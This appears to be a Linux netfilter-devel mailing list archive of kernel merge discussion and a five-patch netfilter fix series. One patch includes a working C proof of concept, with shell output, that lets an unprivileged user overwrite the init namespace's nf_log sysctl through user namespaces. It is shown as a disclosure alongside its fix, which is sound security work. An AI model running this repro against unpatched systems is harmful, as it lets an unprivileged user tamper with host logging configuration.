Re: [GIT] Networking
Hi Dave, On Wed, 05 Oct 2016 22:56:12 -0400 (EDT) David Millerwrote: > > Yes, this is where the change got lost. No worries. > I have all of the fixups queued up in my net tree and will send in a pull > request later. Thanks. -- Cheers, Stephen Rothwell -- To unsubscribe from this list: send the line "unsubscribe netfilter-devel" in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [GIT] Networking
From: Stephen RothwellDate: Thu, 6 Oct 2016 13:51:52 +1100 > On Wed, 5 Oct 2016 19:14:21 -0700 Linus Torvalds > wrote: >> >> On Wed, Oct 5, 2016 at 5:52 PM, Stephen Rothwell >> wrote: >> > >> > Except that commit effectively moved that function from >> > net/netfilter/nf_tables_netdev.c to >> > include/net/netfilter/nf_tables_ipv4.h while commit c73c24849011 >> > ("netfilter: nf_tables_netdev: remove redundant ip_hdr assignment") >> > removed the assignment in the original file (and has been in your tree >> > since v4.8-rc7) and that is where I originally actually got a conflict. >> >> Oh, interesting. Why didn't I get the conflict there then? >> >> I'm guessing (but too lazy to actually look up the history), that >> David ended up doing that merge and that ends up being why I never saw >> a conflict. > > Yeah, commit b50afd203a5e ("Merge > git://git.kernel.org/pub/scm/linux/kernel/git/davem/net") actually > merges v4.8 into the net-next tree. Yes, this is where the change got lost. I have all of the fixups queued up in my net tree and will send in a pull request later. -- To unsubscribe from this list: send the line "unsubscribe netfilter-devel" in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [GIT] Networking
Hi Linus, On Wed, 5 Oct 2016 19:14:21 -0700 Linus Torvaldswrote: > > On Wed, Oct 5, 2016 at 5:52 PM, Stephen Rothwell > wrote: > > > > Except that commit effectively moved that function from > > net/netfilter/nf_tables_netdev.c to > > include/net/netfilter/nf_tables_ipv4.h while commit c73c24849011 > > ("netfilter: nf_tables_netdev: remove redundant ip_hdr assignment") > > removed the assignment in the original file (and has been in your tree > > since v4.8-rc7) and that is where I originally actually got a conflict. > > Oh, interesting. Why didn't I get the conflict there then? > > I'm guessing (but too lazy to actually look up the history), that > David ended up doing that merge and that ends up being why I never saw > a conflict. Yeah, commit b50afd203a5e ("Merge git://git.kernel.org/pub/scm/linux/kernel/git/davem/net") actually merges v4.8 into the net-next tree. -- Cheers, Stephen Rothwell -- To unsubscribe from this list: send the line "unsubscribe netfilter-devel" in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [GIT] Networking
On Wed, Oct 5, 2016 at 5:52 PM, Stephen Rothwellwrote: > > Except that commit effectively moved that function from > net/netfilter/nf_tables_netdev.c to > include/net/netfilter/nf_tables_ipv4.h while commit c73c24849011 > ("netfilter: nf_tables_netdev: remove redundant ip_hdr assignment") > removed the assignment in the original file (and has been in your tree > since v4.8-rc7) and that is where I originally actually got a conflict. Oh, interesting. Why didn't I get the conflict there then? I'm guessing (but too lazy to actually look up the history), that David ended up doing that merge and that ends up being why I never saw a conflict. Linus -- To unsubscribe from this list: send the line "unsubscribe netfilter-devel" in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [GIT] Networking
Hi Linus, On Wed, 5 Oct 2016 15:37:17 -0700 Linus Torvaldswrote: > > On Wed, Oct 5, 2016 at 3:29 PM, Stephen Rothwell > wrote: > > > > I have been carrying the following merge fix patch (for the merge of > > the net-next tree with Linus' tree) for a while now which seems to have > > got missed: > > Ugh. It doesn't seem to be a merge error, because that double iph > assignment came from the original patch that introduced this function: > commit ddc8b6027ad0 ("netfilter: introduce nft_set_pktinfo_{ipv4, > ipv6}_validate()"). Except that commit effectively moved that function from net/netfilter/nf_tables_netdev.c to include/net/netfilter/nf_tables_ipv4.h while commit c73c24849011 ("netfilter: nf_tables_netdev: remove redundant ip_hdr assignment") removed the assignment in the original file (and has been in your tree since v4.8-rc7) and that is where I originally actually got a conflict. > So I wouldn't call it a merge error - it just looks like a bug in the > network layer. So I'm not going to apply your patch even though it > looks plausible to me, simply because it's outside my area of > expertise. no worries. -- Cheers, Stephen Rothwell -- To unsubscribe from this list: send the line "unsubscribe netfilter-devel" in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [GIT] Networking
From: Pablo Neira AyusoDate: Thu, 6 Oct 2016 02:09:45 +0200 > On Wed, Oct 05, 2016 at 03:37:17PM -0700, Linus Torvalds wrote: >> On Wed, Oct 5, 2016 at 3:29 PM, Stephen Rothwell >> wrote: >> > >> > I have been carrying the following merge fix patch (for the merge of >> > the net-next tree with Linus' tree) for a while now which seems to have >> > got missed: >> >> Ugh. It doesn't seem to be a merge error, because that double iph >> assignment came from the original patch that introduced this function: >> commit ddc8b6027ad0 ("netfilter: introduce nft_set_pktinfo_{ipv4, >> ipv6}_validate()"). >> >> So I wouldn't call it a merge error - it just looks like a bug in the >> network layer. So I'm not going to apply your patch even though it >> looks plausible to me, simply because it's outside my area of >> expertise. >> >> David? Pablo? > > This looks good, please take it so we speed up things. > > Acked-by: Pablo Neira Ayuso Applied. -- To unsubscribe from this list: send the line "unsubscribe netfilter-devel" in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [PATCH 0/5] Netfilter fixes for net-next
From: Pablo Neira AyusoDate: Thu, 6 Oct 2016 02:07:44 +0200 > This is a pull request to address fallout from previous nf-next pull > request, only fixes going on here: > > 1) Address a potential null dereference in nf_unregister_net_hook() >when becomes nf_hook_entry_head is NULL, from Aaron Conole. > > 2) Missing ifdef for CONFIG_NETFILTER_INGRESS, also from Aaron. > > 3) Fix linking problems in xt_hashlimit in x86_32, from Pai. > > 4) Fix permissions of nf_log sysctl from unpriviledge netns, from >Jann Horn. > > 5) Fix possible divide by zero in nft_limit, from Liping Zhang. > > You can pull these changes from: > > git://git.kernel.org/pub/scm/linux/kernel/git/pablo/nf-next.git Pulled, thanks Pablo. -- To unsubscribe from this list: send the line "unsubscribe netfilter-devel" in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [GIT] Networking
On Wed, Oct 05, 2016 at 03:37:17PM -0700, Linus Torvalds wrote: > On Wed, Oct 5, 2016 at 3:29 PM, Stephen Rothwell> wrote: > > > > I have been carrying the following merge fix patch (for the merge of > > the net-next tree with Linus' tree) for a while now which seems to have > > got missed: > > Ugh. It doesn't seem to be a merge error, because that double iph > assignment came from the original patch that introduced this function: > commit ddc8b6027ad0 ("netfilter: introduce nft_set_pktinfo_{ipv4, > ipv6}_validate()"). > > So I wouldn't call it a merge error - it just looks like a bug in the > network layer. So I'm not going to apply your patch even though it > looks plausible to me, simply because it's outside my area of > expertise. > > David? Pablo? This looks good, please take it so we speed up things. Acked-by: Pablo Neira Ayuso Thanks! P.S: Sorry for not addressing this any sooner, traveling overhead, conferente and unstable wifi connection has been a problem here. -- To unsubscribe from this list: send the line "unsubscribe netfilter-devel" in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
[PATCH 5/5] netfilter: nft_limit: fix divided by zero panic
From: Liping ZhangAfter I input the following nftables rule, a panic happened on my system: # nft add rule filter OUTPUT limit rate 0xf bytes/second divide error: [#1] SMP [ ... ] RIP: 0010:[] [] nft_limit_pkt_bytes_eval+0x2e/0xa0 [nft_limit] Call Trace: [] nft_do_chain+0xfb/0x4e0 [nf_tables] [] ? nf_nat_setup_info+0x96/0x480 [nf_nat] [] ? ipt_do_table+0x327/0x610 [] ? __nf_nat_alloc_null_binding+0x57/0x80 [nf_nat] [] nft_ipv4_output+0xaf/0xd0 [nf_tables_ipv4] [] nf_iterate+0x62/0x80 [] nf_hook_slow+0x73/0xd0 [] __ip_local_out+0xcd/0xe0 [] ? ip_forward_options+0x1b0/0x1b0 [] ip_local_out+0x1c/0x40 This is because divisor is 64-bit, but we treat it as a 32-bit integer, then 0xf becomes zero, i.e. divisor becomes 0. Signed-off-by: Liping Zhang Signed-off-by: Pablo Neira Ayuso --- net/netfilter/nft_limit.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/net/netfilter/nft_limit.c b/net/netfilter/nft_limit.c index 070b98938e02..c6baf412236d 100644 --- a/net/netfilter/nft_limit.c +++ b/net/netfilter/nft_limit.c @@ -145,7 +145,7 @@ static int nft_limit_pkts_init(const struct nft_ctx *ctx, if (err < 0) return err; - priv->cost = div_u64(priv->limit.nsecs, priv->limit.rate); + priv->cost = div64_u64(priv->limit.nsecs, priv->limit.rate); return 0; } @@ -170,7 +170,7 @@ static void nft_limit_pkt_bytes_eval(const struct nft_expr *expr, const struct nft_pktinfo *pkt) { struct nft_limit *priv = nft_expr_priv(expr); - u64 cost = div_u64(priv->nsecs * pkt->skb->len, priv->rate); + u64 cost = div64_u64(priv->nsecs * pkt->skb->len, priv->rate); if (nft_limit_eval(priv, cost)) regs->verdict.code = NFT_BREAK; -- 2.1.4 -- To unsubscribe from this list: send the line "unsubscribe netfilter-devel" in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
[PATCH 4/5] netfilter: fix namespace handling in nf_log_proc_dostring
From: Jann Hornnf_log_proc_dostring() used current's network namespace instead of the one corresponding to the sysctl file the write was performed on. Because the permission check happens at open time and the nf_log files in namespaces are accessible for the namespace owner, this can be abused by an unprivileged user to effectively write to the init namespace's nf_log sysctls. Stash the "struct net *" in extra2 - data and extra1 are already used. Repro code: #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include char child_stack[100]; uid_t outer_uid; gid_t outer_gid; int stolen_fd = -1; void writefile(char *path, char *buf) { int fd = open(path, O_WRONLY); if (fd == -1) err(1, "unable to open thing"); if (write(fd, buf, strlen(buf)) != strlen(buf)) err(1, "unable to write thing"); close(fd); } int child_fn(void *p_) { if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC, NULL)) err(1, "mount"); /* Yes, we need to set the maps for the net sysctls to recognize us * as namespace root. */ char buf[1000]; sprintf(buf, "0 %d 1\n", (int)outer_uid); writefile("/proc/1/uid_map", buf); writefile("/proc/1/setgroups", "deny"); sprintf(buf, "0 %d 1\n", (int)outer_gid); writefile("/proc/1/gid_map", buf); stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY); if (stolen_fd == -1) err(1, "open nf_log"); return 0; } int main(void) { outer_uid = getuid(); outer_gid = getgid(); int child = clone(child_fn, child_stack + sizeof(child_stack), CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL); if (child == -1) err(1, "clone"); int status; if (wait() != child) err(1, "wait"); if (!WIFEXITED(status) || WEXITSTATUS(status) != 0) errx(1, "child exit status bad"); char *data = "NONE"; if (write(stolen_fd, data, strlen(data)) != strlen(data)) err(1, "write"); return 0; } Repro: $ gcc -Wall -o attack attack.c -std=gnu99 $ cat /proc/sys/net/netfilter/nf_log/2 nf_log_ipv4 $ ./attack $ cat /proc/sys/net/netfilter/nf_log/2 NONE Because this looks like an issue with very low severity, I'm sending it to the public list directly. Signed-off-by: Jann Horn Signed-off-by: Pablo Neira Ayuso --- net/netfilter/nf_log.c | 6 -- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/net/netfilter/nf_log.c b/net/netfilter/nf_log.c index 30a17d649a83..3dca90dc24ad 100644 --- a/net/netfilter/nf_log.c +++ b/net/netfilter/nf_log.c @@ -422,7 +422,7 @@ static int nf_log_proc_dostring(struct ctl_table *table, int write, char buf[NFLOGGER_NAME_LEN]; int r = 0; int tindex = (unsigned long)table->extra1; - struct net *net = current->nsproxy->net_ns; + struct net *net = table->extra2; if (write) { struct ctl_table tmp = *table; @@ -476,7 +476,6 @@ static int netfilter_log_sysctl_init(struct net *net) 3, "%d", i); nf_log_sysctl_table[i].procname = nf_log_sysctl_fnames[i]; - nf_log_sysctl_table[i].data = NULL; nf_log_sysctl_table[i].maxlen = NFLOGGER_NAME_LEN; nf_log_sysctl_table[i].mode = 0644; nf_log_sysctl_table[i].proc_handler = @@ -486,6 +485,9 @@ static int netfilter_log_sysctl_init(struct net *net) } } + for (i = NFPROTO_UNSPEC; i < NFPROTO_NUMPROTO; i++) + table[i].extra2 = net; + net->nf.nf_log_dir_header = register_net_sysctl(net, "net/netfilter/nf_log", table); -- 2.1.4 -- To unsubscribe from this list: send the line "unsubscribe netfilter-devel" in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
[PATCH 3/5] netfilter: xt_hashlimit: Fix link error in 32bit arch because of 64bit division
From: Vishwanath PaiDivision of 64bit integers will cause linker error undefined reference to `__udivdi3'. Fix this by replacing divisions with div64_64 Fixes: 11d5f15723c9 ("netfilter: xt_hashlimit: Create revision 2 to ...") Signed-off-by: Vishwanath Pai Acked-by: Maciej Żenczykowski Signed-off-by: Pablo Neira Ayuso --- net/netfilter/xt_hashlimit.c | 15 --- 1 file changed, 8 insertions(+), 7 deletions(-) diff --git a/net/netfilter/xt_hashlimit.c b/net/netfilter/xt_hashlimit.c index 44a095ecc7b7..2fab0c65aa94 100644 --- a/net/netfilter/xt_hashlimit.c +++ b/net/netfilter/xt_hashlimit.c @@ -467,17 +467,18 @@ static u64 user2credits(u64 user, int revision) /* If multiplying would overflow... */ if (user > 0x / (HZ*CREDITS_PER_JIFFY_v1)) /* Divide first. */ - return (user / XT_HASHLIMIT_SCALE) *\ - HZ * CREDITS_PER_JIFFY_v1; + return div64_u64(user, XT_HASHLIMIT_SCALE) + * HZ * CREDITS_PER_JIFFY_v1; - return (user * HZ * CREDITS_PER_JIFFY_v1) \ - / XT_HASHLIMIT_SCALE; + return div64_u64(user * HZ * CREDITS_PER_JIFFY_v1, +XT_HASHLIMIT_SCALE); } else { if (user > 0x / (HZ*CREDITS_PER_JIFFY)) - return (user / XT_HASHLIMIT_SCALE_v2) *\ - HZ * CREDITS_PER_JIFFY; + return div64_u64(user, XT_HASHLIMIT_SCALE_v2) + * HZ * CREDITS_PER_JIFFY; - return (user * HZ * CREDITS_PER_JIFFY) / XT_HASHLIMIT_SCALE_v2; + return div64_u64(user * HZ * CREDITS_PER_JIFFY, +XT_HASHLIMIT_SCALE_v2); } } -- 2.1.4 -- To unsubscribe from this list: send the line "unsubscribe netfilter-devel" in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
[PATCH 1/5] netfilter: Fix potential null pointer dereference
From: Aaron ConoleIt's possible for nf_hook_entry_head to return NULL. If two nf_unregister_net_hook calls happen simultaneously with a single hook entry in the list, both will enter the nf_hook_mutex critical section. The first will successfully delete the head, but the second will see this NULL pointer and attempt to dereference. This fix ensures that no null pointer dereference could occur when such a condition happens. Fixes: e3b37f11e6e4 ("netfilter: replace list_head with single linked list") Signed-off-by: Aaron Conole Signed-off-by: Pablo Neira Ayuso --- net/netfilter/core.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/netfilter/core.c b/net/netfilter/core.c index fa6715db4581..e3f68a786afe 100644 --- a/net/netfilter/core.c +++ b/net/netfilter/core.c @@ -160,7 +160,7 @@ void nf_unregister_net_hook(struct net *net, const struct nf_hook_ops *reg) mutex_lock(_hook_mutex); hooks_entry = nf_hook_entry_head(net, reg); - if (hooks_entry->orig_ops == reg) { + if (hooks_entry && hooks_entry->orig_ops == reg) { nf_set_hooks_head(net, reg, nf_entry_dereference(hooks_entry->next)); goto unlock; -- 2.1.4 -- To unsubscribe from this list: send the line "unsubscribe netfilter-devel" in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
[PATCH 2/5] netfilter: accommodate different kconfig in nf_set_hooks_head
From: Aaron ConoleWhen CONFIG_NETFILTER_INGRESS is unset (or no), we need to handle the request for registration properly by dropping the hook. This releases the entry during the set. Fixes: e3b37f11e6e4 ("netfilter: replace list_head with single linked list") Signed-off-by: Aaron Conole Signed-off-by: Pablo Neira Ayuso --- net/netfilter/core.c | 15 +++ 1 file changed, 11 insertions(+), 4 deletions(-) diff --git a/net/netfilter/core.c b/net/netfilter/core.c index e3f68a786afe..c9d90eb64046 100644 --- a/net/netfilter/core.c +++ b/net/netfilter/core.c @@ -90,10 +90,12 @@ static void nf_set_hooks_head(struct net *net, const struct nf_hook_ops *reg, { switch (reg->pf) { case NFPROTO_NETDEV: +#ifdef CONFIG_NETFILTER_INGRESS /* We already checked in nf_register_net_hook() that this is * used from ingress. */ rcu_assign_pointer(reg->dev->nf_hooks_ingress, entry); +#endif break; default: rcu_assign_pointer(net->nf.hooks[reg->pf][reg->hooknum], @@ -107,10 +109,15 @@ int nf_register_net_hook(struct net *net, const struct nf_hook_ops *reg) struct nf_hook_entry *hooks_entry; struct nf_hook_entry *entry; - if (reg->pf == NFPROTO_NETDEV && - (reg->hooknum != NF_NETDEV_INGRESS || -!reg->dev || dev_net(reg->dev) != net)) - return -EINVAL; + if (reg->pf == NFPROTO_NETDEV) { +#ifndef CONFIG_NETFILTER_INGRESS + if (reg->hooknum == NF_NETDEV_INGRESS) + return -EOPNOTSUPP; +#endif + if (reg->hooknum != NF_NETDEV_INGRESS || + !reg->dev || dev_net(reg->dev) != net) + return -EINVAL; + } entry = kmalloc(sizeof(*entry), GFP_KERNEL); if (!entry) -- 2.1.4 -- To unsubscribe from this list: send the line "unsubscribe netfilter-devel" in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
[PATCH 0/5] Netfilter fixes for net-next
Hi David, This is a pull request to address fallout from previous nf-next pull request, only fixes going on here: 1) Address a potential null dereference in nf_unregister_net_hook() when becomes nf_hook_entry_head is NULL, from Aaron Conole. 2) Missing ifdef for CONFIG_NETFILTER_INGRESS, also from Aaron. 3) Fix linking problems in xt_hashlimit in x86_32, from Pai. 4) Fix permissions of nf_log sysctl from unpriviledge netns, from Jann Horn. 5) Fix possible divide by zero in nft_limit, from Liping Zhang. You can pull these changes from: git://git.kernel.org/pub/scm/linux/kernel/git/pablo/nf-next.git P.S: Sorry for not addressing this any sooner, a mixture of traveling overhead, conference and problems with wifi connection has prevented me to do this any sooner. Thanks! The following changes since commit 803783849fed11e38a30f31932c02c815520da70: mlx5: Add ndo_poll_controller() implementation (2016-09-30 02:11:16 -0400) are available in the git repository at: git://git.kernel.org/pub/scm/linux/kernel/git/pablo/nf-next.git HEAD for you to fetch changes up to 2fa46c130193300f06e68727ae98ec9f6184cad4: netfilter: nft_limit: fix divided by zero panic (2016-10-04 08:59:03 +0200) Aaron Conole (2): netfilter: Fix potential null pointer dereference netfilter: accommodate different kconfig in nf_set_hooks_head Jann Horn (1): netfilter: fix namespace handling in nf_log_proc_dostring Liping Zhang (1): netfilter: nft_limit: fix divided by zero panic Vishwanath Pai (1): netfilter: xt_hashlimit: Fix link error in 32bit arch because of 64bit division net/netfilter/core.c | 17 - net/netfilter/nf_log.c | 6 -- net/netfilter/nft_limit.c| 4 ++-- net/netfilter/xt_hashlimit.c | 15 --- 4 files changed, 26 insertions(+), 16 deletions(-) -- To unsubscribe from this list: send the line "unsubscribe netfilter-devel" in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [GIT] Networking
On Wed, Oct 5, 2016 at 3:29 PM, Stephen Rothwellwrote: > > I have been carrying the following merge fix patch (for the merge of > the net-next tree with Linus' tree) for a while now which seems to have > got missed: Ugh. It doesn't seem to be a merge error, because that double iph assignment came from the original patch that introduced this function: commit ddc8b6027ad0 ("netfilter: introduce nft_set_pktinfo_{ipv4, ipv6}_validate()"). So I wouldn't call it a merge error - it just looks like a bug in the network layer. So I'm not going to apply your patch even though it looks plausible to me, simply because it's outside my area of expertise. David? Pablo? Linus -- To unsubscribe from this list: send the line "unsubscribe netfilter-devel" in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [GIT] Networking
Hi Linus, Dave, On Wed, 05 Oct 2016 01:44:37 -0400 (EDT) David Millerwrote: > I have been carrying the following merge fix patch (for the merge of the net-next tree with Linus' tree) for a while now which seems to have got missed: From: Stephen Rothwell Date: Tue, 13 Sep 2016 10:08:58 +1000 Subject: [PATCH] netfilter: merge fixup for "nf_tables_netdev: remove redundant ip_hdr assignment" Signed-off-by: Stephen Rothwell --- include/net/netfilter/nf_tables_ipv4.h | 1 - 1 file changed, 1 deletion(-) diff --git a/include/net/netfilter/nf_tables_ipv4.h b/include/net/netfilter/nf_tables_ipv4.h index 968f00b82fb5..25e33aee91e7 100644 --- a/include/net/netfilter/nf_tables_ipv4.h +++ b/include/net/netfilter/nf_tables_ipv4.h @@ -33,7 +33,6 @@ __nft_set_pktinfo_ipv4_validate(struct nft_pktinfo *pkt, if (!iph) return -1; - iph = ip_hdr(skb); if (iph->ihl < 5 || iph->version != 4) return -1; -- 2.8.1 -- Cheers, Stephen Rothwell -- To unsubscribe from this list: send the line "unsubscribe netfilter-devel" in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: error: 'struct net_device' has no member named 'nf_hooks_ingress'
On Wed, 2016-10-05 at 22:56 +0200, Michal Sojka wrote: > this commit is now in mainline as > e3b37f11e6e4e6b6f02cc762f182ce233d2c1c9d and it breaks my build: > > net/netfilter/core.c: In function 'nf_set_hooks_head': > net/netfilter/core.c:96:3: error: 'struct net_device' has no member named > 'nf_hooks_ingress' > > Are the fixes (see below) on the way to mainline too? Yes the fixes are already in nf tree and _will_ get pushed. Pablo and David are attending netdev 1.2 in Tokyo and have obligations. https://git.kernel.org/cgit/linux/kernel/git/pablo/nf-next.git/ Thanks. -- To unsubscribe from this list: send the line "unsubscribe netfilter-devel" in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
error: 'struct net_device' has no member named 'nf_hooks_ingress'
Hi, On Tue, Oct 04 2016, Sergey Senozhatsky wrote: > On (09/27/16 19:03), Sergey Senozhatsky wrote: >> Hello, >> >> On (09/27/16 16:40), Stephen Rothwell wrote: >> > >> > Changes since 20160923: >> > >> >> seems that commit e3b37f11e6e4e6b6 ("netfilter: replace list_head with >> single linked list") breaks the build on !CONFIG_NETFILTER_INGRESS systems >> accessing ->nf_hooks_ingress this commit is now in mainline as e3b37f11e6e4e6b6f02cc762f182ce233d2c1c9d and it breaks my build: net/netfilter/core.c: In function 'nf_set_hooks_head': net/netfilter/core.c:96:3: error: 'struct net_device' has no member named 'nf_hooks_ingress' Are the fixes (see below) on the way to mainline too? Thanks. -Michal >> >> static void nf_set_hooks_head(struct net *net, const struct nf_hook_ops *reg, >> struct nf_hook_entry *entry) >> { >>switch (reg->pf) { >>case NFPROTO_NETDEV: >>/* We already checked in nf_register_net_hook() that this is >> * used from ingress. >> */ >>rcu_assign_pointer(reg->dev->nf_hooks_ingress, entry); >> > > > so I see two commits in linux-next now that fix the commit in question in > two patches > > : commit 7816ec564ec40ae20bb7925f733a181cad0cc491 ("netfilter: accommodate > : different kconfig in nf_set_hooks_head") > : > :When CONFIG_NETFILTER_INGRESS is unset (or no), we need to handle > :the request for registration properly by dropping the hook. This > :releases the entry during the set. > : > :Fixes: e3b37f11e6e4 ("netfilter: replace list_head with single linked > list") > > and > > : commit 5119e4381a90fabd3442bde02707cbd9e5d7367a ("netfilter: Fix potential > : null pointer dereference") > : > :It's possible for nf_hook_entry_head to return NULL. If two > :nf_unregister_net_hook calls happen simultaneously with a single hook > :entry in the list, both will enter the nf_hook_mutex critical section. > :The first will successfully delete the head, but the second will see > :this NULL pointer and attempt to dereference. > : > :This fix ensures that no null pointer dereference could occur when such > :a condition happens. > : > :Fixes: e3b37f11e6e4 ("netfilter: replace list_head with single linked > list") > > > do you guys plan to fold those into "e3b37f11e6e4" (a preferred way) > or will send it out as 3 separate patches (um, why) ? > > -ss -- To unsubscribe from this list: send the line "unsubscribe netfilter-devel" in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html